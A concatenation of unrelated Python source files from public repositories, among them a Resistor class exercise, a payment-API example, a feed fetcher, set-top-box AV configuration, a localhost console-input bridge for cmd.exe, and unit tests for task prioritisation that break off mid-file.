states that the voltage V through a resistor is equal to the current
(I) times the resistance:
V = I * R
The units of these are volts, ampheres (or "amps"), and ohms,
respectively. In real circuits, often R is actually measured in
kiloohms (10**3 ohms) and I in milliamps (10**-3 amps).
Let's create a Resistor class that models this behavior. The
constructor takes two arguments - the resistance in ohms, and the
voltage in volts:
>>> resistor = Resistor(800, 5.5)
>>> resistor.resistance
800
>>> resistor.voltage
5.5
The current is derived from these two using Ohm's law:
(Hint: use @property)
>>> resistor.current
0.006875
Since we may want the value in milliamps, let's make another property
to provide that:
>>> resistor.current_in_milliamps
6.875
Let's set it up so that we can change the current, and doing so will
correspondingly modify the voltage (but keep the resistance constant).
>>> resistor.current_in_milliamps = 3.5
>>> resistor.resistance
800
>>> round(resistor.voltage, 2)
2.8
>>> resistor.current = .006875
>>> round(resistor.voltage, 2)
5.5
>>> resistor.resistance
800
Also, we've made a design decision that a Resistor cannot change its
resistance value once created:
>>> resistor.resistance = 8200
Traceback (most recent call last):
AttributeError: can't set attribute
'''
# Write your code here:
class Resistor:
def __init__(self, resistance, voltage):
self._resistance = resistance
self.voltage = voltage
@property
def resistance(self):
return self._resistance
@property
def current(self):
return self.voltage / self.resistance
@current.setter
def current(self, value):
self.voltage = self.resistance * value
@property
def current_in_milliamps(self):
return self.current * 1000
@current_in_milliamps.setter
def current_in_milliamps(self, value):
self.current = value / 1000
# Do not edit any code below this line!
if __name__ == '__main__':
import doctest
count, _ = doctest.testmod()
if count == 0:
print('*** ALL TESTS PASS ***\nGive someone a HIGH FIVE!')
# Copyright 2015-2018 Aaron Maxwell. All rights reserved.
|
arannasousa/pagseguro_xml
|
exemplos/testes_notificacao.py
|
# coding=utf-8
# ---------------------------------------------------------------
# Desenvolvedor: Arannã Sousa Santos
# Mês: 12
# Ano: 2015
# Projeto: pagseguro_xml
# e-mail: asousas@live.com
# ---------------------------------------------------------------
import logging
from pagseguro_xml.notificacao import ApiPagSeguroNotificacao_v3, CONST_v3
logger = logging.basicConfig(level=logging.DEBUG)
PAGSEGURO_API_AMBIENTE = u'sandbox'
PAGSEGURO_API_EMAIL = u'seu@email.com'
PAGSEGURO_API_TOKEN_PRODUCAO = u''
PAGSEGURO_API_TOKEN_SANDBOX = u''
CHAVE_NOTIFICACAO = u'AA0000-AA00A0A0AA00-AA00AA000000-AA0000' # ela éh de producao
api = ApiPagSeguroNotificacao_v3(ambiente=CONST_v3.AMBIENTE.SANDBOX)
PAGSEGURO_API_TOKEN = PAGSEGURO_API_TOKEN_PRODUCAO
ok, retorno = api.consulta_notificacao_transacao_v3(PAGSEGURO_API_EMAIL, PAGSEGURO_API_TOKEN, CHAVE_NOTIFICACAO)
if ok:
print u'-' * 50
print retorno.xml
print u'-' * 50
for a in retorno.alertas:
print a
else:
print u'Motivo do erro:', retorno
|
denys-duchier/Scolar
|
ZopeProducts/exUserFolder/Plugins.py
|
#
#
# (C) Copyright 2001 The Internet (Aust) Pty Ltd
# ACN: 082 081 472 ABN: 83 082 081 472
# All Rights Reserved
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
#
# Author: Andrew Milton <akm@theinternet.com.au>
# $Id: Plugins.py,v 1.5 2004/11/10 14:15:33 akm Exp $
import App, Globals, OFS
import string
import time
from Globals import ImageFile, HTMLFile, HTML, MessageDialog, package_home
from OFS.Folder import Folder
class PluginRegister:
def __init__(self, name, description, pluginClass,
pluginStartForm, pluginStartMethod,
pluginEditForm=None, pluginEditMethod=None):
self.name=name #No Spaces please...
self.description=description
self.plugin=pluginClass
self.manage_addForm=pluginStartForm
self.manage_addMethod=pluginStartMethod
self.manage_editForm=pluginEditForm
self.manage_editMethod=pluginEditMethod
class CryptoPluginRegister:
def __init__(self, name, crypto, description, pluginMethod):
self.name = name #No Spaces please...
self.cryptoMethod = crypto
self.description = description
self.plugin = pluginMethod
|
hylom/grrreader
|
backend/feedfetcher.py
|
#!/usr/bin/python
"feed fetcher"
from db import MySQLDatabase
from fetcher import FeedFetcher
def main():
db = MySQLDatabase()
fetcher = FeedFetcher()
feeds = db.get_feeds(offset=0, limit=10)
read_count = 10
while len(feeds) > 0:
for feed in feeds:
fid = feed[0]
url = feed[1]
title = feed[2]
print "fetching #{0}: {1}".format(fid, url)
entries = fetcher.fetch(url)
for entry in entries:
entry.feed_id = fid
try:
print "insert {0}".format(entry.url)
except UnicodeEncodeError:
print "insert {0}".format(entry.url.encode('utf-8'))
db.append_feed_content(entry)
feeds = db.get_feeds(offset=read_count, limit=10)
read_count += 10
if __name__ == '__main__':
main()
|
droundy/deft
|
papers/hughes-saft/figs/density_calc.py
|
#!/usr/bin/env python
import math
fin = open('figs/single-rod-in-water.dat', 'r')
fout = open('figs/single-rods-calculated-density.dat', 'w')
kB = 3.16681539628059e-6 # This is Boltzmann's constant in Hartree/Kelvin
first = 1
nm = 18.8972613
for line in fin:
current = str(line)
pieces = current.split('\t')
if first:
r2 = float(pieces[0])/2*nm
E2 = float(pieces[1])
first = 0
else:
if ((float(pieces[0])/2*nm - r2) > 0.25):
r1 = r2
r2 = float(pieces[0])/2*nm
E1 = E2
E2 = float(pieces[1]) # actually it's energy per unit length!
length = 1 # arbitrary
r = (r1 + r2)/2
dEdR = (E2-E1)/(r2-r1)*length
area = 2*math.pi*r*length
force = dEdR
pressure = force/area
kT = kB*298 # about this
ncontact = pressure/kT
fout.write(str(r)+'\t'+str(ncontact)+'\n')
fin.close()
fout.close()
|
viswimmer1/PythonGenerator
|
data/python_files/34574373/cmss.py
|
import win32pipe
import win32console
import win32process
import time
import win32con
import codecs
import ctypes
user32 = ctypes.windll.user32
CONQUE_WINDOWS_VK = {
'3' : win32con.VK_CANCEL,
'8' : win32con.VK_BACK,
'9' : win32con.VK_TAB,
'12' : win32con.VK_CLEAR,
'13' : win32con.VK_RETURN,
'17' : win32con.VK_CONTROL,
'20' : win32con.VK_CAPITAL,
'27' : win32con.VK_ESCAPE,
'28' : win32con.VK_CONVERT,
'35' : win32con.VK_END,
'36' : win32con.VK_HOME,
'37' : win32con.VK_LEFT,
'38' : win32con.VK_UP,
'39' : win32con.VK_RIGHT,
'40' : win32con.VK_DOWN,
'45' : win32con.VK_INSERT,
'46' : win32con.VK_DELETE,
'47' : win32con.VK_HELP
}
def make_input_key(c, control_key_state=None):
kc = win32console.PyINPUT_RECORDType (win32console.KEY_EVENT)
kc.KeyDown = True
kc.RepeatCount = 1
cnum = ord(c)
if cnum == 3:
pid_list = win32console.GetConsoleProcessList()
win32console.GenerateConsoleCtrlEvent(win32con.CTRL_C_EVENT, 0)
return
else:
kc.Char = unicode(c)
if str(cnum) in CONQUE_WINDOWS_VK:
kc.VirtualKeyCode = CONQUE_WINDOWS_VK[str(cnum)]
else:
kc.VirtualKeyCode = ctypes.windll.user32.VkKeyScanA(cnum)
#kc.VirtualKeyCode = ctypes.windll.user32.VkKeyScanA(cnum+96)
#kc.ControlKeyState = win32con.LEFT_CTRL_PRESSED
return kc
#win32console.AttachConsole()
coord = win32console.PyCOORDType
con_stdout = win32console.GetStdHandle(win32console.STD_OUTPUT_HANDLE)
con_stdin = win32console.GetStdHandle(win32console.STD_INPUT_HANDLE)
flags = win32process.NORMAL_PRIORITY_CLASS
si = win32process.STARTUPINFO()
si.dwFlags |= win32con.STARTF_USESHOWWINDOW
(handle1, handle2, i1, i2) = win32process.CreateProcess(None, "cmd.exe", None, None, 0, flags, None, '.', si)
time.sleep(1)
#size = con_stdout.GetConsoleScreenBufferInfo()['Window']
# with codecs.open("log.txt", "w", "utf8") as f:
# for i in xrange(0, size.Bottom):
# f.write(con_stdout.ReadConsoleOutputCharacter(size.Right+1, coord(0, i)))
# f.write("\n")
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
HOST = "127.0.0.1"
PORT = 5554
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((HOST, PORT))
s.listen(1)
(sc, scname) = s.accept()
while True:
msg = sc.recv(1)
if ord(msg) == 0:
break
keys = [make_input_key(msg)]
if keys:
con_stdin.WriteConsoleInput(keys)
win32process.TerminateProcess(handle1, 0)
|
deggis/drinkcounter
|
clients/s60-python/client.py
|
import urllib2
import appuifw, e32
from key_codes import *
class Drinker(object):
def __init__(self):
self.id = 0
self.name = ""
self.prom = 0.0
self.idle = ""
self.drinks = 0
def get_drinker_list():
data = urllib2.urlopen("http://192.168.11.5:8080/drinkcounter/get_datas/").read().split("\n")
drinkers = []
for data_row in data:
if data_row == '': continue
fields = data_row.split('|')
drinker = Drinker()
drinker.id = int(fields[0])
drinker.name = fields[1]
drinker.drinks = int(fields[2])
drinker.prom = float(fields[3])
drinker.idle = fields[4]
drinkers.append(drinker)
return drinkers
def get_listbox_items(drinkers):
items = []
for drinker in drinkers:
items.append(unicode('%s, %d drinks, %s' % (drinker.name, drinker.drinks, drinker.idle)))
return items
appuifw.app.title = u"Alkoholilaskuri"
app_lock = e32.Ao_lock()
#Define the exit function
def quit():
app_lock.signal()
appuifw.app.exit_key_handler = quit
drinkers = get_drinker_list()
items = get_listbox_items(drinkers)
#Define a function that is called when an item is selected
def handle_selection():
selected_drinker = drinkers[lb.current()]
urllib2.urlopen("http://192.168.11.5:8080/drinkcounter/add_drink/%d/" % (selected_drinker.id))
appuifw.note(u"A drink has been added to " + drinkers[lb.current()].name, 'info')
new_drinkers = get_drinker_list()
items = get_listbox_items(new_drinkers)
lb.set_list(items, lb.current())
#Create an instance of Listbox and set it as the application's body
lb = appuifw.Listbox(items, handle_selection)
appuifw.app.body = lb
app_lock.wait()
|
eesatfan/vuplus-enigma2
|
lib/python/Components/AVSwitch.py
|
from config import config, ConfigSlider, ConfigSelection, ConfigYesNo, \
ConfigEnableDisable, ConfigSubsection, ConfigBoolean, ConfigSelectionNumber, ConfigNothing, NoSave
from enigma import eAVSwitch, getDesktop
from SystemInfo import SystemInfo
from os import path as os_path
class AVSwitch:
def setInput(self, input):
INPUT = { "ENCODER": 0, "SCART": 1, "AUX": 2 }
eAVSwitch.getInstance().setInput(INPUT[input])
def setColorFormat(self, value):
eAVSwitch.getInstance().setColorFormat(value)
def setAspectRatio(self, value):
eAVSwitch.getInstance().setAspectRatio(value)
def setSystem(self, value):
eAVSwitch.getInstance().setVideomode(value)
def getOutputAspect(self):
valstr = config.av.aspectratio.value
if valstr in ("4_3_letterbox", "4_3_panscan"): # 4:3
return (4,3)
elif valstr == "16_9": # auto ... 4:3 or 16:9
try:
aspect_str = open("/proc/stb/vmpeg/0/aspect", "r").read()
if aspect_str == "1": # 4:3
return (4,3)
except IOError:
pass
elif valstr in ("16_9_always", "16_9_letterbox"): # 16:9
pass
elif valstr in ("16_10_letterbox", "16_10_panscan"): # 16:10
return (16,10)
return (16,9)
def getFramebufferScale(self):
aspect = self.getOutputAspect()
fb_size = getDesktop(0).size()
return (aspect[0] * fb_size.height(), aspect[1] * fb_size.width())
def getAspectRatioSetting(self):
valstr = config.av.aspectratio.value
if valstr == "4_3_letterbox":
val = 0
elif valstr == "4_3_panscan":
val = 1
elif valstr == "16_9":
val = 2
elif valstr == "16_9_always":
val = 3
elif valstr == "16_10_letterbox":
val = 4
elif valstr == "16_10_panscan":
val = 5
elif valstr == "16_9_letterbox":
val = 6
return val
def setAspectWSS(self, aspect=None):
if not config.av.wss.value:
value = 2 # auto(4:3_off)
else:
value = 1 # auto
eAVSwitch.getInstance().setWSS(value)
def InitAVSwitch():
config.av = ConfigSubsection()
config.av.yuvenabled = ConfigBoolean(default=False)
colorformat_choices = {"cvbs": _("CVBS"), "rgb": _("RGB"), "svideo": _("S-Video")}
# when YUV is not enabled, don't let the user select it
if config.av.yuvenabled.value:
colorformat_choices["yuv"] = _("YPbPr")
# ikseong
config.av.colorformat = ConfigSelection(choices=colorformat_choices, default="cvbs")
config.av.aspectratio = ConfigSelection(choices={
"4_3_letterbox": _("4:3 Letterbox"),
"4_3_panscan": _("4:3 PanScan"),
"16_9": _("16:9"),
"16_9_always": _("16:9 always"),
"16_10_letterbox": _("16:10 Letterbox"),
"16_10_panscan": _("16:10 PanScan"),
"16_9_letterbox": _("16:9 Letterbox")},
default = "4_3_letterbox")
config.av.aspect = ConfigSelection(choices={
"4_3": _("4:3"),
"16_9": _("16:9"),
"16_10": _("16:10"),
"auto": _("Automatic")},
default = "auto")
config.av.policy_169 = ConfigSelection(choices={
# TRANSLATORS: (aspect ratio policy: black bars on top/bottom) in doubt, keep english term.
"letterbox": _("Letterbox"),
# TRANSLATORS: (aspect ratio policy: cropped content on left/right) in doubt, keep english term
"panscan": _("Pan&Scan"),
# TRANSLATORS: (aspect ratio policy: display as fullscreen, even if this breaks the aspect)
"scale": _("Just Scale")},
default = "letterbox")
config.av.policy_43 = ConfigSelection(choices={
# TRANSLATORS: (aspect ratio policy: black bars on left/right) in doubt, keep english term.
"pillarbox": _("Pillarbox"),
# TRANSLATORS: (aspect ratio policy: cropped content on left/right) in doubt, keep english term
"panscan": _("Pan&Scan"),
# TRANSLATORS: (aspect ratio policy: display as fullscreen, with stretching the left/right)
"nonlinear": _("Nonlinear"),
# TRANSLATORS: (aspect ratio policy: display as fullscreen, even if this breaks the aspect)
"scale": _("Just Scale")},
default = "pillarbox")
config.av.tvsystem = ConfigSelection(choices = {"pal": _("PAL"), "ntsc": _("NTSC"), "multinorm": _("multinorm")}, default="pal")
config.av.wss = ConfigEnableDisable(default = True)
config.av.defaultac3 = ConfigYesNo(default = False)
config.av.generalAC3delay = ConfigSelectionNumber(-1000, 1000, 25, default = 0)
config.av.generalPCMdelay = ConfigSelectionNumber(-1000, 1000, 25, default = 0)
config.av.vcrswitch = ConfigEnableDisable(default = False)
iAVSwitch = AVSwitch()
def setColorFormat(configElement):
map = {"cvbs": 0, "rgb": 1, "svideo": 2, "yuv": 3}
iAVSwitch.setColorFormat(map[configElement.value])
def setAspectRatio(configElement):
map = {"4_3_letterbox": 0, "4_3_panscan": 1, "16_9": 2, "16_9_always": 3, "16_10_letterbox": 4, "16_10_panscan": 5, "16_9_letterbox" : 6}
iAVSwitch.setAspectRatio(map[configElement.value])
def setSystem(configElement):
map = {"pal": 0, "ntsc": 1, "multinorm" : 2}
iAVSwitch.setSystem(map[configElement.value])
def setWSS(configElement):
iAVSwitch.setAspectWSS()
# this will call the "setup-val" initial
config.av.colorformat.addNotifier(setColorFormat)
config.av.aspectratio.addNotifier(setAspectRatio)
config.av.tvsystem.addNotifier(setSystem)
config.av.wss.addNotifier(setWSS)
iAVSwitch.setInput("ENCODER") # init on startup
SystemInfo["ScartSwitch"] = eAVSwitch.getInstance().haveScartSwitch()
try:
can_downmix = open("/proc/stb/audio/ac3_choices", "r").read()[:-1].find("downmix") != -1
except:
can_downmix = False
SystemInfo["CanDownmixAC3"] = can_downmix
if can_downmix:
def setAC3Downmix(configElement):
open("/proc/stb/audio/ac3", "w").write(configElement.value and "downmix" or "passthrough")
config.av.downmix_ac3 = ConfigYesNo(default = True)
config.av.downmix_ac3.addNotifier(setAC3Downmix)
try:
can_downmix_aac = open("/proc/stb/audio/aac_choices", "r").read()[:-1].find("downmix") != -1
except:
can_downmix_aac = False
SystemInfo["CanDownmixAAC"] = can_downmix_aac
if can_downmix_aac:
def setAACDownmix(configElement):
open("/proc/stb/audio/aac", "w").write(configElement.value and "downmix" or "passthrough")
config.av.downmix_aac = ConfigYesNo(default = True)
config.av.downmix_aac.addNotifier(setAACDownmix)
try:
can_osd_alpha = open("/proc/stb/video/alpha", "r") and True or False
except:
can_osd_alpha = False
SystemInfo["CanChangeOsdAlpha"] = can_osd_alpha
def setAlpha(config):
open("/proc/stb/video/alpha", "w").write(str(config.value))
if can_osd_alpha:
config.av.osd_alpha = ConfigSlider(default=255, limits=(0,255))
config.av.osd_alpha.addNotifier(setAlpha)
if os_path.exists("/proc/stb/vmpeg/0/pep_scaler_sharpness"):
def setScaler_sharpness(config):
myval = int(config.value)
try:
print "--> setting scaler_sharpness to: %0.8X" % myval
open("/proc/stb/vmpeg/0/pep_scaler_sharpness", "w").write("%0.8X" % myval)
open("/proc/stb/vmpeg/0/pep_apply", "w").write("1")
except IOError:
print "couldn't write pep_scaler_sharpness"
config.av.scaler_sharpness = ConfigSlider(default=13, limits=(0,26))
config.av.scaler_sharpness.addNotifier(setScaler_sharpness)
else:
config.av.scaler_sharpness = NoSave(ConfigNothing())
|
ARL-UTEP-OC/emubox
|
workshop-manager/bin/RequestHandler/client_updater.py
|
import sys
import time
import logging
from socketio import socketio_manage
from socketio.mixins import BroadcastMixin
from socketio.namespace import BaseNamespace
from DataAggregation.webdata_aggregator import getAvailableWorkshops
logger = logging.getLogger(__name__)
std_out_logger = logging.StreamHandler(sys.stdout)
logger.addHandler(std_out_logger)
def broadcast_msg(server, ns_name, event, *args):
pkt = dict(type="event",
name=event,
args=args,
endpoint=ns_name)
for sessid, socket in server.sockets.iteritems():
socket.send_packet(pkt)
def workshops_monitor(server):
sizes = []
workshops = getAvailableWorkshops()
for w in workshops:
tmp = [w.workshopName, w.q.qsize()]
sizes.append(tmp)
broadcast_msg(server, '', "sizes", tmp)
while True:
logger.info("Participants viewing frontend:" + str(len(server.sockets)))
workshops_available = []
curr_workshops = getAvailableWorkshops()
for w in curr_workshops:
workshops_available.append([w.workshopName, w.q.qsize()])
wq = filter(lambda x: x[0] == w.workshopName, sizes)[0]
if wq[1] != w.q.qsize():
wq[1] = w.q.qsize()
logging.info("client_updater: New update being pushed to clients: " + str(wq))
broadcast_msg(server, '', 'sizes', wq)
logger.info("Workshops available:" + str(workshops_available))
time.sleep(1)
class RequestHandlerApp(object):
def __call__(self, environ, start_response):
if environ['PATH_INFO'].startswith('/socket.io'):
socketio_manage(environ, {'': QueueStatusHandler})
class QueueStatusHandler(BaseNamespace, BroadcastMixin):
def on_connect(self):
sizes = []
workshops = getAvailableWorkshops()
for w in workshops:
tmp = [w.workshopName, w.q.qsize()]
sizes.append(tmp)
self.emit('sizes', tmp)
|
bluciam/ruby_versus_python
|
other/dicco_numbers.py
|
def freq_month(obj):
if obj is None or obj == []:
return
months = {1: 'jan',
2: 'feb',
3: 'mar',
4: 'apr',
5: 'may',
6: 'jun',
7: 'jul',
8: 'aug',
9: 'sep',
10: 'oct',
11: 'nov',
12: 'dec',
}
frequencies = [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
# for i in range(0, len(obj)):
# frequencies[ obj[i] -1] += 1
for i in obj:
frequencies[ i-1 ] += 1
print "The following month(s) have a birthday celebration"
for i in range(0, len(frequencies)):
if frequencies[i] > 0:
print str(months[i+1]) + " has " + str(frequencies[i])
return frequencies
in_array = [3,6,2,7,7,7,]
print freq_month(in_array)
print freq_month([])
|
izrik/tudor
|
tests/logic_t/layer/LogicLayer/test_task_prioritize.py
|
#!/usr/bin/env python
import unittest
from werkzeug.exceptions import NotFound, Forbidden
from tests.logic_t.layer.LogicLayer.util import generate_ll
class TaskPrioritizeBeforeLogicLayerTest(unittest.TestCase):
def setUp(self):
self.ll = generate_ll()
self.pl = self.ll.pl
def test_add_prioritize_before_adds_prioritize_before(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
t2.users.append(user)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
# when
results = self.ll.do_add_prioritize_before_to_task(t1.id, t2.id, user)
# then
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(1, len(t1.prioritize_before))
self.assertEqual(1, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertTrue(t2 in t1.prioritize_before)
self.assertTrue(t1 in t2.prioritize_after)
self.assertIsNotNone(results)
self.assertEqual([t1, t2], list(results))
def test_if_already_added_still_succeeds(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
t1.prioritize_before.append(t2)
user = self.pl.create_user('name@example.com')
t1.users.append(user)
t2.users.append(user)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(1, len(t1.prioritize_before))
self.assertEqual(1, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertTrue(t2 in t1.prioritize_before)
self.assertTrue(t1 in t2.prioritize_after)
# when
results = self.ll.do_add_prioritize_before_to_task(t1.id, t2.id, user)
# then
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(1, len(t1.prioritize_before))
self.assertEqual(1, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertTrue(t2 in t1.prioritize_before)
self.assertTrue(t1 in t2.prioritize_after)
self.assertIsNotNone(results)
self.assertEqual([t1, t2], list(results))
def test_null_ids_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
t2.users.append(user)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
# expect
self.assertRaises(ValueError, self.ll.do_add_prioritize_before_to_task,
None, t2.id, user)
# expect
self.assertRaises(ValueError, self.ll.do_add_prioritize_before_to_task,
t1.id, None, user)
# expect
self.assertRaises(ValueError, self.ll.do_add_prioritize_before_to_task,
None, None, user)
# then
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
def test_null_user_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
t2.users.append(user)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
# expect
self.assertRaises(ValueError, self.ll.do_add_prioritize_before_to_task,
t1.id, t2.id, None)
# then
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
def test_user_not_authorized_for_task_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t2.users.append(user)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
# expect
self.assertRaises(Forbidden, self.ll.do_add_prioritize_before_to_task,
t1.id, t2.id, user)
# then
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
def test_user_not_authorized_for_prioritize_before_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
# expect
self.assertRaises(Forbidden, self.ll.do_add_prioritize_before_to_task,
t1.id, t2.id, user)
# then
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
def test_task_not_found_raises_exception(self):
# given
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t2.users.append(user)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertIsNone(self.pl.get_task(t2.id + 1))
# expect
self.assertRaises(NotFound, self.ll.do_add_prioritize_before_to_task,
t2.id + 1, t2.id, user)
# then
self.assertEqual(0, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertIsNone(self.pl.get_task(t2.id+1))
def test_prioritize_before_not_found_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
self.pl.add(t1)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t1.prioritize_before))
self.assertIsNone(self.pl.get_task(t1.id + 1))
# expect
self.assertRaises(NotFound, self.ll.do_add_prioritize_before_to_task,
t1.id, t1.id + 1, user)
# then
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t1.prioritize_before))
self.assertIsNone(self.pl.get_task(t1.id + 1))
def test_remove_prioritize_before_removes_prioritize_before(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
t2.users.append(user)
t1.prioritize_before.append(t2)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(1, len(t1.prioritize_before))
self.assertEqual(1, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertTrue(t2 in t1.prioritize_before)
self.assertTrue(t1 in t2.prioritize_after)
# when
results = self.ll.do_remove_prioritize_before_from_task(t1.id, t2.id,
user)
# then
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertIsNotNone(results)
self.assertEqual([t1, t2], list(results))
def test_if_prioritize_before_already_removed_still_succeeds(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
t2.users.append(user)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
# when
results = self.ll.do_remove_prioritize_before_from_task(t1.id, t2.id,
user)
# then
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertIsNotNone(results)
self.assertEqual([t1, t2], list(results))
def test_remove_prioritize_before_with_null_ids_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
t2.users.append(user)
t1.prioritize_before.append(t2)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(1, len(t1.prioritize_before))
self.assertEqual(1, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertTrue(t2 in t1.prioritize_before)
self.assertTrue(t1 in t2.prioritize_after)
# expect
self.assertRaises(ValueError,
self.ll.do_remove_prioritize_before_from_task,
None, t2.id, user)
# expect
self.assertRaises(ValueError,
self.ll.do_remove_prioritize_before_from_task,
t1.id, None, user)
# expect
self.assertRaises(ValueError,
self.ll.do_remove_prioritize_before_from_task,
None, None, user)
# then
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(1, len(t1.prioritize_before))
self.assertEqual(1, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertTrue(t2 in t1.prioritize_before)
self.assertTrue(t1 in t2.prioritize_after)
def test_remove_prioritize_before_with_null_user_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
t2.users.append(user)
t1.prioritize_before.append(t2)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(1, len(t1.prioritize_before))
self.assertEqual(1, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
